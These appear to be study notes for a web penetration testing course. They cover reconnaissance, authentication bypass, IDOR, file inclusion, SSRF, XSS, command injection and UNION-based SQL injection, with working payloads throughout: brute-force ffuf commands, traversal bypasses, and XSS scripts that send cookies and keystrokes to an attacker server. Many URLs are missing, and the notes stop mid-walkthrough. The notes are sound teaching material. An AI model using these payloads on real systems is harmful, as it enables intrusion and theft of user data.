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Content discovery

Manual discovery


The robots.txt file is a document that tells search engines which pages they are and aren't allowed to show on their search engine results or ban specific search engines from crawling the website altogether. It can be common practice to restrict certain website areas so they aren't displayed in search engine results. These pages may be areas such as administration portals or files meant for the website's customers. This file gives us a great list of locations on the website that the owners don't want us to discover as penetration testers.


The favicon is a small icon displayed in the browser's address bar or tab used for branding a website.

Sometimes when frameworks are used to build a website, a favicon that is part of the installation gets leftover, and if the website developer doesn't replace this with a custom one, this can give us a clue on what framework is in use. OWASP host a database of common framework icons that you can use to check against the targets favicon Once we know the framework stack, we can use external resources to discover more about it.

curl | md5sum


Unlike the robots.txt file, which restricts what search engine crawlers can look at, the sitemap.xml file gives a list of every file the website owner wishes to be listed on a search engine. These can sometimes contain areas of the website that are a bit more difficult to navigate to or even list some old webpages that the current site no longer uses but are still working behind the scenes.

HTTP Headers

When we make requests to the web server, the server returns various HTTP headers. These headers can sometimes contain useful information such as the webserver software and possibly the programming/scripting language in use. Using this information, we could find vulnerable versions of software being used.


There are also external resources available that can help in discovering information about your target website; these resources are often referred to as OSINT or (Open-Source Intelligence) as they're freely available tools that collect information:

Google Hacking / Dorking

Google hacking / Dorking utilizes Google's advanced search engine features, which allow you to pick out custom content.

Filter Example Description
site returns results only from the specified website address
inurl inurl:admin returns results that have the specified word in the URL
filetype filetype:pdf returns results which are a particular file extension
intitle intitle:admin returns results that contain the specified word in the title

More information about google hacking can be found here:


Wappalyzer ( is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well.

Wayback Machine

The Wayback Machine ( is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website.


You can use GitHub's search feature to look for company names or website names to try and locate repositories belonging to your target. Once discovered, you may have access to source code, passwords or other content that you hadn't yet found.

S3 Buckets

S3 buckets can be discovered in many ways, such as finding the URLs in the website's page source, GitHub repositories, or even automating the process. One common automation method is by using the company name followed by common terms such as {name}-assets, {name}-www, {name}-public,{name}-private, etc.

Automated discovery

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u
dirb /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
gobuster dir --url -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

Subdomain enumeration


When an SSL/TLS certificate is created for a domain by a CA, CA's take part in what's called "Certificate Transparency (CT) logs". These are publicly accessible logs of every SSL/TLS certificate created for a domain name. The purpose of Certificate Transparency logs is to stop malicious and accidentally made certificates from being used.


Search Engines

Using advanced search methods on websites like Google, such as the site: filter, can narrow the search results. For example, site:* would only contain results leading to the domain name but exclude any links to; therefore, it shows us only subdomain names belonging to


Bruteforce DNS enumeration is the method of trying tens, hundreds, thousands or even millions of different possible subdomains from a pre-defined list of commonly used subdomains. Because this method requires many requests, we automate it with tools to make the process quicker. We can use dnsrecon to perform this.

dnsrecon -t brt -d

Automation Using Sublist3r

To speed up the process of OSINT subdomain discovery, we can automate the above methods with the help of tools like Sublist3r.

./ -d

Virtual Hosts

Some subdomains aren't always hosted in publically accessible DNS results, such as development versions of a web application or administration portals. Instead, the DNS record could be kept on a private DNS server or recorded on the developer's machines in their /etc/hosts file (or c:\\windows\\system32\\drivers\\etc\\hosts file for Windows users) which maps domain names to IP addresses.

Because web servers can host multiple websites from one server when a website is requested from a client, the server knows which website the client wants from the Host header. We can utilise this host header by making changes to it and monitoring the response to see if we've discovered a new website.

Like with DNS Bruteforce, we can automate this process by using a wordlist of commonly used subdomains.

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host:" -u

Because the above command will always produce a valid result, we need to filter the output. We can do this by using the page size result with the -fs switch. Edit the below command replacing {size} with the most occurring size value from the previous result.

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host:" -u -fs {size}

Authentication bypass

Username enumeration

If you try entering the username admin and fill in the other form fields with fake information, you'll see we get the error An account with this username already exists. We can use the existence of this error message to produce a list of valid usernames already signed up on the system by using the ffuf tool below. The ffuf tool uses a list of commonly used usernames to check against for any matches.

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u -mr "username already exists"


We can create a file with the previously found users and use it to attempt a brute force attack on the login page.

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u -fc 200

Logic Flaw

Sometimes authentication processes contain logic flaws. A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated by a hacker. Logic flaws can exist in any area of a website, but we're going to concentrate on examples relating to authentication in this instance.

Logic Flaw Example The below mock code example checks to see whether the start of the path the client is visiting begins with /admin and if so, then further checks are made to see whether the client is, in fact, an admin. If the page doesn't begin with /admin, the page is shown to the client.

if( url.substr(0,6) === '/admin') {
    # Code to check user is an admin
} else {
    # View Page

Because the above PHP code example uses three equals signs (===), it's looking for an exact match on the string, including the same letter casing. The code presents a logic flaw because an unauthenticated user requesting /adMin will not have their privileges checked and have the page displayed to them, totally bypassing the authentication checks.

curl '' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=emile'

In the application, the user account is retrieved using the query string, but later on, in the application logic, the password reset email is sent using the data found in the PHP variable $_REQUEST.

The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used for both the query string and POST data, the application logic for this variable favours POST data fields rather than the query string, so if we add another parameter to the POST form, we can control where the password reset email gets delivered.

curl '' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=emile&'

Plain Text

The contents of some cookies can be in plain text, and it is obvious what they do. Take, for example, if these were the cookie set after a successful login:

Set-Cookie: logged_in=true; Max-Age=3600; Path=/
Set-Cookie: admin=false; Max-Age=3600; Path=/

We see one cookie (logged_in), which appears to control whether the user is currently logged in or not, and another (admin), which controls whether the visitor has admin privileges. Using this logic, if we were to change the contents of the cookies and make a request we'll be able to change our privileges.

curl -H "Cookie: logged_in=true; admin=true"


Even though the hash is irreversible, the same output is produced every time, which is helpful for us as services such as keep databases of billions of hashes and their original strings.


Take the below data as an example which is set by the web server upon logging in:

Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/

This string base64 decoded has the value of {"id":1,"admin": false} we can then encode this back to base64 encoded again but instead setting the admin value to true, which now gives us admin access.


IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability.

This type of vulnerability can occur when a web server receives user-supplied input to retrieve objects (files, data, documents), too much trust has been placed on the input data, and it is not validated on the server-side to confirm the requested object belongs to the user requesting it.


Imagine you've just signed up for an online service, and you want to change your profile information. The link you click on goes to http://online-service.thm/profile?user_id=1305, and you can see your information.

Try changing the user_id value to 1000 instead (http://online-service.thm/profile?user_id=1000), and to your surprise, you can now see another user's information. Ideally, there should be a check on the website to confirm that the user information belongs to the user logged requesting it.

Encoded IDs

When passing data from page to page either by post data, query strings, or cookies, web developers will often first take the raw data and encode it. Encoding ensures that the receiving web server will be able to understand the contents. Encoding changes binary data into an ASCII string commonly using the a-z, A-Z, 0-9 and = character for padding. The most common encoding technique on the web is base64 encoding and can usually be pretty easy to spot. You can use websites like to decode the string, then edit the data and re-encode it again using and then resubmit the web request to see if there is a change in the response.

Hashed IDs

Hashed IDs are a little bit more complicated to deal with than encoded ones, but they may follow a predictable pattern, such as being the hashed version of the integer value. For example, the Id number 123 would become 202cb962ac59075b964b07152d234b70 if md5 hashing were in use.

It's worthwhile putting any discovered hashes through a web service such as (which has a database of billions of hash to value results) to see if we can find any matches.

Unpredictable IDs

If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them. If you can view the other users' content using their Id number while still being logged in with a different account (or not logged in at all), you've found a valid IDOR vulnerability.

Where are they located?

The vulnerable endpoint you're targeting may not always be something you see in the address bar. It could be content your browser loads in via an AJAX request or something that you find referenced in a JavaScript file.

Sometimes endpoints could have an unreferenced parameter that may have been of some use during development and got pushed to production. For example, you may notice a call to /user/details displaying your user information (authenticated through your session). But through an attack known as parameter mining, you discover a parameter called user_id that you can use to display other users' information, for example, /user/details?user_id=123.

File Inclusion

Path traversal

Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application's URL to locate and access files or directories stored outside the application's root directory.

Path traversal vulnerabilities occur when the user's input is passed to a function such as file_get_contents in PHP. It's important to note that the function is not the main contributor to the vulnerability. Often poor input validation or filtering is the cause of the vulnerability. In PHP, you can use the file_get_contents to read the content of a file. You can find more information about the function here.

Local File Inclusion

LFI attacks against web applications are often due to a developers' lack of security awareness. With PHP, using functions such as include, require, include_once, and require_once often contribute to vulnerable web applications.


If the include function reads the input with .php at the end! This tells us that the developer specifies the file type to pass to the include function. To bypass this scenario, we can use the NULL BYTE, which is %00.

In case of keywords filtering, the /etc/passwd file may be filtered. There are two possible methods to bypass the filter. First, by using the NullByte %00 or the current directory trick at the end of the filtered keyword /..

In case of ../ replacement by an empty string, we can send the following payload to bypass it: ....//....//....//....//....//etc/passwd.


Remote File Inclusion (RFI) is a technique to include remote files and into a vulnerable application. Like LFI, the RFI occurs when improperly sanitizing user input, allowing an attacker to inject an external URL into include function. One requirement for RFI is that the allow_url_fopen option needs to be on.

The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:

  • Sensitive Information Disclosure
  • XSS
  • DoS


To prevent the file inclusion vulnerabilities, some common suggestions include:

  • Keep system and services, including web application frameworks, updated with the latest version.
  • Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.
  • A Web Application Firewall (WAF) is a good option to help mitigate web application attacks.
  • Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them, such as allow_url_fopen on and allow_url_include.
  • Carefully analyze the web application and allow only protocols and PHP wrappers that are in need.
  • Never trust user input, and make sure to implement proper input validation against file inclusion.
  • Implement whitelisting for file names and locations as well as blacklisting.


SSRF stands for Server-Side Request Forgery. It's a vulnerability that allows a malicious user to cause the webserver to make an additional or edited HTTP request to the resource of the attacker's choosing.

There are two types of SSRF vulnerability; the first is a regular SSRF where data is returned to the attacker's screen. The second is a Blind SSRF vulnerability where an SSRF occurs, but no information is returned to the attacker's screen.

A successful SSRF attack can result in any of the following:

  • Access to unauthorised areas.
  • Access to customer/organisational data.
  • Ability to Scale to internal networks.
  • Reveal authentication tokens/credentials.


URL manipulation

Expected request:

Malicious request:

Server request:

Then the server returns user data to the attacker instead of stock item.

Path traversal

Expected request:

Malicious request:

Server request:

Then the server returns user data to the attacker instead of stock item.

Subdomain manipulation

Expected request:

Malicious request:

Server request:

Then the server returns user data to the attacker instead of stock item.

Finding an SSRF

  • Full URL in the address bar https://example;com/form?server=
  • Hidden field in a form:

47b31c77457fe2116a871709cfa1082a.png - Partial URL: - Path of URL:

In case of blind SSRF you'll need an external server to monitor request such as or

Defeating Common SSRF Defenses

Deny List

A Deny List is where all requests are accepted apart from resources specified in a list or matching a particular pattern. A Web Application may employ a deny list to protect sensitive endpoints, IP addresses or domains from being accessed by the public while still allowing access to other locations. A specific endpoint to restrict access is the localhost, which may contain server performance data or further sensitive information, so domain names such as localhost and would appear on a deny list. Attackers can bypass a Deny List by using alternative localhost references such as 0,, 0000, 127.1, 127.*.*.*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address such as

Also, in a cloud environment, it would be beneficial to block access to the IP address, which contains metadata for the deployed cloud server, including possibly sensitive information. An attacker can bypass this by registering a subdomain on their own domain with a DNS record that points to the IP Address

Allow List

An allow list is where all requests get denied unless they appear on a list or match a particular pattern, such as a rule that an URL used in a parameter must begin with An attacker could quickly circumvent this rule by creating a subdomain on an attacker's domain name, such as The application logic would now allow this input and let an attacker control the internal HTTP request.

Open Redirect

If the above bypasses do not work, there is one more trick up the attacker's sleeve, the open redirect. An open redirect is an endpoint on the server where the website visitor gets automatically redirected to another website address. Take, for example, the link This endpoint was created to record the number of times visitors have clicked on this link for advertising/marketing purposes. But imagine there was a potential SSRF vulnerability with stringent rules which only allowed URLs beginning with An attacker could utilise the above feature to redirect the internal HTTP request to a domain of the attacker's choice.

Cross-site Scripting

Cross-Site Scripting, better known as XSS in the cybersecurity community, is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users.


Proof Of Concept

This is the simplest of payloads where all you want to do is demonstrate that you can achieve XSS on a website. This is often done by causing an alert box to pop up on the page with a string of text, for example:


Session Stealing

The below JavaScript takes the target's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control to be logged.

<script>fetch('' + btoa(document.cookie));</script>

Key Logger

The below code acts as a key logger. This means anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details.

<script>document.onkeypress = function(e) { fetch('' + btoa(e.key) );}</script>

Business Logic

This payload is a lot more specific than the above examples. This would be about calling a particular network resource or a JavaScript function. For example, imagine a JavaScript function for changing the user's email address called user.changeEmail(). Your payload could look like this:


Reflected XSS

Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.

Example Scenario

A website where if you enter incorrect input, an error message is displayed. The content of the error message gets taken from the error parameter in the query string and is built directly into the page source.
</div><script src=""></script>
    <p><script src=""></script></p>

Potential Impact

The attacker could send links or embed them into an iframe on another website containing a JavaScript payload to potential victims getting them to execute code on their browser, potentially revealing session or customer information.

How to test for Reflected XSS:

You'll need to test every possible point of entry; these include:

  • Parameters in the URL Query String
  • URL File Path
  • Sometimes HTTP Headers (although unlikely exploitable in practice)

Stored XSS

As the name infers, the XSS payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.

Example Scenario

A blog website that allows users to post comments. Unfortunately, these comments aren't checked for whether they contain JavaScript or filter out any malicious code. If we now post a comment containing JavaScript, this will be stored in the database, and every other user now visiting the article will have the JavaScript run in their browser.

Potential Impact

The malicious JavaScript could redirect users to another site, steal the user's session cookie, or perform other website actions while acting as the visiting user.

How to test for Stored XSS

You'll need to test every possible point of entry where it seems data is stored and then shown back in areas that other users have access to; a small example of these could be:

  • Comments on a blog
  • User profile information
  • Website Listings

Sometimes developers think limiting input values on the client-side is good enough protection, so changing values to something the web application wouldn't be expecting is a good source of discovering stored XSS, for example, an age field that is expecting an integer from a dropdown menu, but instead, you manually send the request rather than using the form allowing you to try malicious payloads.


DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document, and this document can be either displayed in the browser window or as the HTML source.

Exploiting the DOM

DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs when the website JavaScript code acts on input or user interaction.

Example Scenario

The website's JavaScript gets the contents from the window.location.hash parameter and then writes that onto the page in the currently being viewed section. The contents of the hash aren't checked for malicious code, allowing an attacker to inject JavaScript of their choosing onto the webpage.

Potential Impact

Crafted links could be sent to potential victims, redirecting them to another website or steal content from the page or the user's session.

How to test for Dom Based XSS

You'd need to look for parts of the code that access certain variables that an attacker can have control over, such as window.location.x parameters.

When you've found those bits of code, you'd then need to see how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript methods such as eval().

Blind XSS

Blind XSS is similar to a stored XSS in that your payload gets stored on the website for another user to view, but in this instance, you can't see the payload working or be able to test it against yourself first.

Example Scenario

A website has a contact form where you can message a member of staff. The message content doesn't get checked for any malicious code, which allows the attacker to enter anything they wish. These messages then get turned into support tickets which staff view on a private web portal.

Potential Impact

Using the correct payload, the attacker's JavaScript could make calls back to an attacker's website, revealing the staff portal URL, the staff member's cookies, and even the contents of the portal page that is being viewed. Now the attacker could potentially hijack the staff member's session and have access to the private portal.

How to test for Blind XSS

When testing for Blind XSS vulnerabilities, you need to ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.

A popular tool for Blind XSS attacks is xsshunter. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.

Polyglot XSS

An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e


If you've found a Blind XSS, you can listen on a specific port on your server:

nc -nlvp 9001

Then, ce payload below will exfiltrate informations like cookie:
<script>fetch('http://{URL_OR_IP}:9001?cookie=' + btoa(document.cookie) );</script>

Also, you can use requestbin or beeceptor.

Let's breakdown the payload:

  • The fetch() command makes an HTTP request.
  • ?cookie= is the query string that will contain the victim's cookies.
  • btoa() command base64 encodes the victim's cookies.
  • document.cookie accesses the victim's cookies.

Command injection

A command injection vulnerability is also known as a Remote Code Execution (RCE) because an attacker can trick the application into executing a series of payloads that they provide, without direct access to the machine itself (i.e. an interactive shell). The webserver will process this code and execute it under the privileges and access controls of the user who is running that application.

Discovering Command Injection

This vulnerability exists because applications often use functions in programming languages such as PHP, Python and NodeJS to pass data to and to make system calls on the machine’s operating system. For example, taking input from a field and searching for an entry into a file.

Exploiting Command Injection

Applications that use user input to populate system commands with data can often be combined in unintended behaviour. For example, the shell operators ;, & and && will combine two (or more) system commands and execute them both.

Command Injection can be detected in mostly one of two ways:

  • Blind command injection
  • Verbose command injection

I have defined these two methods in the table below, where the two sections underneath will explain these in greater detail.

Method Description
Blind This type of injection is where there is no direct output from the application when testing payloads. You will have to investigate the behaviours of the application to determine whether or not your payload was successful.
Verbose This type of injection is where there is direct feedback from the application once you have tested a payload. For example, running the whoami command to see what user the application is running under. The web application will output the username on the page directly.

Detecting Blind Injection

For this type of command injection, we will need to use payloads that will cause some time delay. For example, the ping and sleep commands are significant payloads to test with. Using ping as an example, the application will hang for x seconds in relation to how many pings you have specified.

Another method of detecting blind command injection is by forcing some output. This can be done by using redirection operators such as >. For example, we can tell the web application to execute commands such as whoami and redirect that to a file. We can then use a command such as cat to read this newly created file’s contents.

The curl command is a great way to test for command injection. This is because you are able to use curl to deliver data to and from an application in your payload.


Detecting Verbose Command Injection

Detecting command injection this way is arguably the easiest method of the two. Verbose command injection is when the application gives you feedback or output as to what is happening or being executed.

For example, the output of commands such as ping or whoami is directly displayed on the web application.


Payload Description
whoami See what user the application is running under.
ls List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things.
ping This command will invoke the application to hang. This will be useful in testing an application for blind command injection.
sleep This is another useful payload in testing an application for blind command injection, where the machine does not have ping installed.
nc Netcat can be used to spawn a reverse shell onto the vulnerable application. You can use this foothold to navigate around the target machine for other services, files, or potential means of escalating privileges.


Payload Description
whoami See what user the application is running under.
dir List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things.
ping This command will invoke the application to hang. This will be useful in testing an application for blind command injection.
timeout This command will also invoke the application to hang. It is also useful for testing an application for blind command injection if the ping command is not installed.

Remediating Command Injection

Command injection can be prevented in a variety of ways. Everything from minimal use of potentially dangerous functions or libraries in a programming language to filtering input without relying on a user’s input. I have detailed these a bit further below. The examples below are of the PHP programming language; however, the same principles can be extended to many other languages.

Vulnerable Functions

In PHP, many functions interact with the operating system to execute commands via shell; these include: - Exec - Passthru - System

For example, you can set a pattern for user input:

<input type="test" pattern="[0-9]+"
  1. The application will only accept a specific pattern of characters (the digits 0-9)
  2. The application will then only proceed to execute this data which is all numerical.

Input sanitisation

Sanitising any input from a user that an application uses is a great way to prevent command injection. This is a process of specifying the formats or types of data that a user can submit. For example, an input field that only accepts numerical data or removes any special characters such as > , & and /.

In the snippet below, the filter_input PHP function is used to check whether or not any data submitted via an input form is a number or not. If it is not a number, it must be invalid input.

    if (!filter_input(INPU_GET, "number", FILTER_VALIDATE_NUMBER)){

Bypassing Filters

Applications will employ numerous techniques in filtering and sanitising data that is taken from a user's input. These filters will restrict you to specific payloads; however, we can abuse the logic behind an application to bypass these filters. For example, an application may strip out quotation marks; we can instead use the hexadecimal value of this to achieve the same result.

When executed, although the data given will be in a different format than what is expected, it can still be interpreted and will have the same result.

$payload = "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"


SQL Injection

SQL (Structured Query Language) Injection, mostly referred to as SQLi, is an attack on a web application database server that causes malicious queries to be executed. When a web application communicates with a database using input from a user that hasn't been properly validated, there runs the potential of an attacker being able to steal, delete or alter private and customer data and also attack the web applications authentication methods to private or customer areas. This is why as well as SQLi being one of the oldest web application vulnerabilities, it also can be the most damaging.

What's a Database?

A database is a way of electronically storing collections of data in an organised manner. A database is controlled by a DBMS which is an acronym for Database Management System, DBMS's fall into two camps Relational or Non-Relational. Concerning Relational databases, some common one's you'll come across are MySQL, Microsoft SQL Server, Access, PostgreSQL and SQLite. We'll explain the difference between Relational and Non-Relational databases at the end but first, it's important to learn a few terms.

Within a DBMS, you can have multiple databases, each containing its own set of related data. For example, you may have a database called "shop". Within this database, you want to store information about products available to purchase, users who have signed up to your online shop, and information about the orders you've received. You'd store this information separately in the database using something called tables, the tables are identified with a unique name for each one.

What are tables?

A table is made up of columns and rows, a useful way to imagine a table is like a grid with the columns going across the top from left to right containing the name of the cell and the rows going from top to bottom with each one having the actual data.


Each column, better referred to as a field has a unique name per table. When creating a column, you also set the type of data it will contain, common ones being integer (numbers), strings (standard text) or dates. Some databases can contain much more complex data, such as geospatial, which contains location information. Setting the data type also ensures that incorrect information isn't stored, such as the string "hello world" being stored in a column meant for dates. If this happens, the database server will usually produce an error message. A column containing an integer can also have an auto-increment feature enabled; this gives each row of data a unique number that grows (increments) with each subsequent row, doing so creates what is called a key field, a key field has to be unique for every row of data which can be used to find that exact row in SQL queries.


Rows or records are what contains the individual lines of data. When you add data to the table, a new row/record is created, and when you delete data, a row/record is removed.

Relational Vs Non-Relational Databases:

A relational database, stores information in tables and often the tables have shared information between them, they use columns to specify and define the data being stored and rows to actually store the data. The tables will often contain a column that has a unique ID (primary key) which will then be used in other tables to reference it and cause a relationship between the tables, hence the name relational database.

Non-relational databases sometimes called NoSQL on the other hand is any sort of database that doesn't use tables, columns and rows to store the data, a specific database layout doesn't need to be constructed so each row of data can contain different information which can give more flexibility over a relational database. Some popular databases of this type are MongoDB, Cassandra and ElasticSearch.

What's SQL ?

SQL (Structured Query Language) is a feature-rich language used for querying databases, these SQL queries are better referred to as statements.

The simplest of the commands which we'll cover in this task is used to retrieve (select), update, insert and delete data. Although somewhat similar, some databases servers have their own syntax and slight changes to how things work. All of these examples are based on a MySQL database.


The first query type is the SELECT query used to retrieve data from the database. select * from users; | id | username | password | | -- | -------- | -------- | | 1 | jon | pass123 | | 2 | admin | p4ssword | | 3 | martin | secret123|

The first-word SELECT tells the database we want to retrieve some data, the * tells the database we want to receive back all columns from the table. For example, the table may contain three columns (id, username and password). from users tells the database we want to retrieve the data from the table named users. Finally, the semicolon at the end tells the database that this is the end of the query.

The next query is similar to the above, but this time, instead of using the * to return all columns in the database table, we are just requesting the username and password field.

select username,password from users;

username password
jon pass123
admin p4ssword
martin secret123

The following query, like the first, returns all the columns by using the * selector and then the "LIMIT 1" clause forces the database only to return one row of data. Changing the query to "LIMIT 1,1" forces the query to skip the first result, and then "LIMIT 2,1" skips the first two results, and so on. You need to remember the first number tells the database how many results you wish to skip, and the second number tells the database how many rows to return.

select * from users LIMIT 1;

id username password
1 jon pass123

Lastly, we're going to utilise the where clause; this is how we can finely pick out the exact data we require by returning data that matches our specific clauses:

select * from users where username='admin';

id username password
2 admin p4ssword

This will only return the rows where the username is equal to admin.

select * from users where username != 'admin';

id username password
1 jon pass123
3 martin secret123

This will only return the rows where the username is NOT equal to admin.

select * from users where username='admin' or username='jon';

id username password
1 jon pass123
2 admin p4ssword

This will only return the rows where the username is either equal to admin or jon.

select * from users where username='admin' and password='p4ssword';

id username password
2 admin p4ssword

This will only return the rows where the username is equal to admin, and the password is equal to p4ssword.

Using the like clause allows you to specify data that isn't an exact match but instead either starts, contains or ends with certain characters by choosing where to place the wildcard character represented by a percentage sign %.

select * from users where username like 'a%';

id username password
2 admin p4ssword

This returns any rows with username beginning with the letter a.

select * from users where username like '%n';

id username password
1 jon pass123
2 admin p4ssword
3 martin secret123

This returns any rows with username ending with the letter n.

select * from users where username like '%mi%';

id username password
2 admin p4ssword

This returns any rows with a username containing the characters mi within them.


The UNION statement combines the results of two or more SELECT statements to retrieve data from either single or multiple tables; the rules to this query are that the UNION statement must retrieve the same number of columns in each SELECT statement, the columns have to be of a similar data type and the column order has to be the same. This might sound not very clear, so let's use the following analogy. Say a company wants to create a list of addresses for all customers and suppliers to post a new catalogue. We have one table called customers with the following contents:

id name address city postcode
1 Mr John Smith 123 Fake Street Manchester M2 3FJ
2 Mrs Jenny Palmer 99 Green Road Birmingham B2 4KL
3 Miss Sarah Lewis 15 Fore Street London NW12 3GH

And another called suppliers with the following contents:

id company address city postcode
1 Widgets Ltd Unit 1a, Newby Estate Bristol BS19 4RT
2 The Tool Company 75 Industrial Road Norwich N22 3DR
3 Axe Makers Ltd 2b Makers Unit, Market Road London SE9 1KK

Using the following SQL Statement, we can gather the results from the two tables and put them into one result set:

SELECT name,address,city,postcode from customers UNION SELECT company,address,city,postcode from suppliers;

name address city postcode
Mr John Smith 123 Fake Street Manchester M2 3FJ
Mrs Jenny Palmer 99 Green Road Birmingham B2 4KL
Miss Sarah Lewis 15 Fore Street London NW12 3GH
Widgets Ltd Unit 1a, Newby Estate Bristol BS19 4RT
The Tool Company 75 Industrial Road Norwich N22 3DR
Axe Makers Ltd 2b Makers Unit, Market Road London


The INSERT statement tells the database we wish to insert a new row of data into the table. "into users" tells the database which table we wish to insert the data into, "(username,password)" provides the columns we are providing data for and then "values ('bob','password');" provides the data for the previously specified columns.

insert into users (username,password) values ('bob','password123');

id username password
1 jon pass123
2 admin p4ssword
3 martin secret123
4 bob password123


The UPDATE statement tells the database we wish to update one or more rows of data within a table. You specify the table you wish to update using "update %tablename% SET" and then select the field or fields you wish to update as a comma-separated list such as "username='root',password='pass123'" then finally similar to the SELECT statement, you can specify exactly which rows to update using the where clause such as "where username='admin;".

update users SET username='root',password='pass123' where username='admin';

id username password
1 jon pass123
2 root p4ssword
3 martin secret123
4 bob password123


The DELETE statement tells the database we wish to delete one or more rows of data. Apart from missing the columns you wish to be returned, the format of this query is very similar to the SELECT. You can specify precisely which data to delete using the where clause and the number of rows to be deleted using the LIMIT clause.

delete from users where username='martin';

id username password
1 jon pass123
2 root p4ssword
4 bob password123

delete from users;

Because no WHERE clause was being used in the query, all the data is deleted in the table. | id | username | password | | -- | -------- | -------- |

What is SQL Injection?

The point wherein a web application using SQL can turn into SQL Injection is when user-provided data gets included in the SQL query.

What does it look like?

Take the following scenario where you've come across an online blog, and each blog entry has a unique id number. The blog entries may be either set to public or private depending on whether they're ready for public release. The URL for each blog entry may look something like this:

From the URL above, you can see that the blog entry been selected comes from the id parameter in the query string. The web application needs to retrieve the article from the database and may use an SQL statement that looks something like the following:

SELECT * from blog where id=1 and private=0 LIMIT 1;

Let's pretend article id 2 is still locked as private, so it cannot be viewed on the website. We could now instead call the URL:;--

Which would then, in turn, produce the SQL statement:

SELECT * from blog where id=2;-- and private=0 LIMIT 1;

The semicolon in the URL signifies the end of the SQL statement, and the two dashes cause everything afterwards to be treated as a comment. By doing this, you're just, in fact, running the query:

SELECT * from blog where id=2;--

Which will return the article with an id of 2 whether it is set to public or not.

In-Band SQLi

In-Band SQL Injection

In-Band SQL Injection is the easiest type to detect and exploit; In-Band just refers to the same method of communication being used to exploit the vulnerability and also receive the results, for example, discovering an SQL Injection vulnerability on a website page and then being able to extract data from the database to the same page.

Error-Based SQL Injection

This type of SQL Injection is the most useful for easily obtaining information about the database structure as error messages from the database are printed directly to the browser screen. This can often be used to enumerate a whole database.

Union-Based SQL Injection

This type of Injection utilises the SQL UNION operator alongside a SELECT statement to return additional results to the page. This method is the most common way of extracting large amounts of data via an SQL Injection vulnerability.


Try typing an apostrophe ( ' ) after the id=1 and press enter. And you'll see this returns an SQL error informing you of an error in your syntax. The fact that you've received this error message confirms the existence of an SQL Injection vulnerability. We can now exploit this vulnerability and use the error messages to learn more about the database structure.

The first thing we need to do is return data to the browser without displaying an error message. Firstly we'll try the UNION operator so we can receive an extra result of our choosing. Try setting the mock browsers id parameter to:


This statement should produce an error message informing you that the UNION SELECT statement has a different number of columns than the original SELECT query. So let's try again but add another column:


Same error again, so let's repeat by adding another column:


Success, the error message has gone, and the article is being displayed, but now we want to display our data instead of the article. The article is being displayed because it takes the first returned result somewhere in the web site's code and shows that. To get around that, we need the first query to produce no results. This can simply be done by changing the article id from 1 to 0.


You'll now see the article is just made up of the result from the UNION select returning the column values 1, 2, and 3. We can start using these returned values to retrieve more useful information. First, we'll get the database name that we have access to:

0 UNION SELECT 1,2,database()

You'll now see where the number 3 was previously displayed; it now shows the name of the database, which is sqli_one.

Our next query will gather a list of tables that are in this database.

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

There are a couple of new things to learn in this query. Firstly, the method group_concat() gets the specified column (in our case, table_name) from multiple returned rows and puts it into one string separated by commas. The next thing is the information_schema database; every user of the database has access to this, and it contains information about all the databases and tables the user has access to. In this particular query, we're interested in listing all the tables in the sqli_one database, which is article and staff_users.

As the first level aims to discover Martin's password, the staff_users table is what is of interest to us. We can utilise the information_schema database again to find the structure of this table using the below query.

0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

